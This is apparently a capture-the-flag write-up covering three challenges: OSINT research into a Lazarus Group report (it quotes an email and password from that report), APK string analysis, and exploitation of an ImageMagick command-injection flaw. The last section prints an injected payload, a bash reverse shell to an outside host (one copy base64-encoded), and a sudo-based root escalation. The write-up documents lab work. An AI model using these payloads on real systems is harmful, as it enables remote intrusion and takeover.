Arab Regional Cybersecurity CT F 2023 Challenges -OSINT-Mobile-Machines Writeup
— — — — — — — — + — — — — — — — -+ — — — — +
| Challenge ===| Category | Points |
+ — — — — — — — — + — — — — — — — -+ — — — — +
| Mission Impossible | Osint | 200 |
| ِAct | Mobile | 50 |
| GIF Mak3R | Machine | 50 |
+ — — — — — — — — + — — — — — — — -+ — — — — +
let’s start with :
Points: 200
Description :
In June 2013,
cybercriminals began launching DDoS attacks against government websites.
Recently, they resurfaced under a new name, Operation Troy.
The APT group accidentally released a significant and sensitive document about themselves.
We attempted to search for it online,
but it seems the website where they uploaded it isn't searchable.
We require your assistance in locating this document so that we can access the information we need.
— From the description we got that the cyber-criminals name is “Operation Troy” and the have crime in 2013 DDOS attack
now let’s google about
we will find the following article from wikipedia
now we know that the cyber criminals is “Lazarus group” and the old name is “Darkseoul”
from the description there is a documentation accidentally released about APT group (Lazarus group)
The APT group accidentally released a significant and sensitive document about themselves
at this time hint released
`Mission Impossible`
If you got the document from the largest collection of malware source code, samples, and papers site on the internet. use it wisely.
ok let’s find the largest collection of malware source code on the internet
after search, i found the following GitHub repository called : vxunderground
the github repository has collection of malware source code, samples, and papers as in the Description
Yes, I am in the right way
they have a large database of malwares with documentations and source code
let’s search for things in 2013
after opening Operation Troy
we will find the samples with the documentation
Now we need the documentation of Operation Troy
The Documentation is 29 pages and contains many information
After a long search in the documentation I found a section called analysis containing “calling card a day after the attacks in the form of a web pop-up message”
and there is an email and password
“joseph.r.ulatoski@gmail.com::lqaz@WSX3edc$RFV”
for pastepin.com and www.dropbox.com these credentials did not work for both
so let’s do username enumeration using sherlock osint tool
username: “joseph.r.ulatoski”
python3 sherlock.py joseph.r.ulatoski
this username “joseph.r.ulatoski” has many social accounts
let’s check them one by one in our browser
The first bitcoin forum link was very attractive due to date of creation
then show posts we will found a post contain a pastbin link
I found that Pastebin needs a password so I tried the password found with the email “lqaz@WSX3edc$RFV” but not work so
I remembered that I found the encryption password in the documentation on page 28 “dkwero38oerA^t@#”
The password didn’t work
so I returned back to the PDF searching for the password
and found that the password needs “.” at the end so
The correct password is “dkwero38oerA^t@#.”
After Hard work got the Flag :
Flag{FR13ND5_R41lY1NG_3VERY0N3_EMBR4C1N9_P34CE_4DV0C473_L0U61Y_3XPRE551N9_S01iDAR17Y
****************************************************************************
The second Challenge :
Act
mobile : 50 points
Description :
I started with static analysis to the ‘act.apk’ file with strings
strings act.apk
I found that there are names of files with extensions .xml & .png
so I tried to extract these files using binwalk & foremost tools
binwalk -e act.apk
now we need to know apk file Structure
From the description, I saw that he asked for javascript code
so let’s look at assets
index.android.bundle is the JavaScript bundle file
lets use strings for common words to get the flag
strings * | grep -i flag
yes that is the javascript code,
I found in “index.android.bundle” file contains interesting flags
so let’s copy js code and open it in Online JavaScript beautifier
I found the following :
‘flag{N0t_Th4t_E4sy}’)(“616b66607c37333662363f3036613f3765643f3f663366306161643335613632653e653f667a”)
I tried “flag{N0t_Th4t_E4sy}” as a flag but it was wrong
so let’s use the cyberchef with the hex near the flag
“616b66607c37333662363f3036613f3765643f3f663366306161643335613632653e653f667a” + magic + intensive mode
finally got the flag “flag{041e1871f80bc88a4a7ffc42f15b9b8a}”
****************************************************************************
The Third Challange
machine : 50 points
The challenge was about CVE-2023–34153
The vulnerability is at ImageMagick version 7.1.0–1
at option “pixel-formate” when we upload a file to convert
the following command runs on the back-end server
➜ magick convert -define video:pixel-format='rgba"`cat test.txt > /tmp/leak3.txt`"' smile.gif smile.mov
that converts the uploaded gif file to .mov file
so we can add our reverse shell code in the following format :
rgba"`cat test.txt > /tmp/leak3.txt`
from the errors in the website during testing I found “/tmp/file” so I thought it was Linux server
i made the following bash reverse shell
bash -i >& /dev/tcp/255.255.255.255/5555 0>&1
but i used base64 encoding to avoid errors
rgba"`echo ImJhc2ggLWkgPiYgL2Rldi90Y3AvMTY1LjIzMi4xODAuNzkvNTU1NSAwPiYxIg== | base64 -d | bash`"
then i made a listener on my vps
nc -nlvp <port>
Then run convert in the website —> i got reverse shell on my vps
unfortunately i forget to take screen shots from my vps when the challenge was running
then we need to privilege escalation
it was so easy “sudo -l ”
Found neofetch any user can run as root with sudo
using gitfobins https://gtfobins.github.io/gtfobins/neofetch/
using the above commands got the root shell
And the flag found at “/root/flag.txt”
Thanks for your time and effort to read this. I hope you liked and enjoyed reading it.
you can find web & forensics writeups in the following links written by my team friends :
If you have any comments, edits, or another way to solve them, don’t hesitate to contact me: